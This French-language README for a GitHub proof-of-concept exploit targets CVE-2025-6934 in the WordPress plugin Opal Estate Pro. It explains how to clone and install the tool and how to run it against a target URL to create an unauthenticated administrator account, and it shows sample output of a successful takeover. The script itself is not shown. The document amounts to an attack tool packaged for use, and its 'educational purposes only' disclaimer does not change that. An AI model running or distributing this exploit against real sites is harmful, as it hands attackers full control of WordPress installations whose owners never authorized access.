
Preuve de concept d'exploitation pour CVE-2025-6934, une vulnérabilité critique du plugin WordPress Opal Estate Pro permettant la création de compte administrateur non authentifiée. Comprend la détection automatique de version, l'extraction de nonce et l'exploitation de point de terminaison AJAX.
📖 Description
Ce dépôt contient une preuve de concept (PoC) d'exploit pour CVE-2025-6934,
une vulnérabilité critique dans le plugin WordPress Opal Estate Pro <= 1.7.5, permettant la création d'un compte administrateur sans authentification.
⚠️ Avertissement : Cet outil est fourni uniquement à des fins éducatives et de recherche en sécurité.
L'auteur n'est pas responsable de toute mauvaise utilisation ou des dommages causés.
readme.txtClonez le dépôt et installez les dépendances :
git clone https://github.com/yukinime/CVE-2025-6934.git
cd CVE-2025-6934
pip3 install -r requirements.txt
requirements.txt
requests
beautifulsoup4
colorama
Exécutez le script avec votre cible :
python3 CVE-2025-6934.py -u http://target.com/ -mail [email protected] -password MySecurePass123 -user newadmin
✅ Exemple de sortie :
[✔] Exploitation réussie!
Username : newadmin
Email : [email protected]
Password : MySecurePass123
Role : administrator
Capture d'écran de l'exploitation
Cyberlone Indonesia (Cyberlone)
Ce projet est sous licence MIT – voir LICENSE pour plus de détails.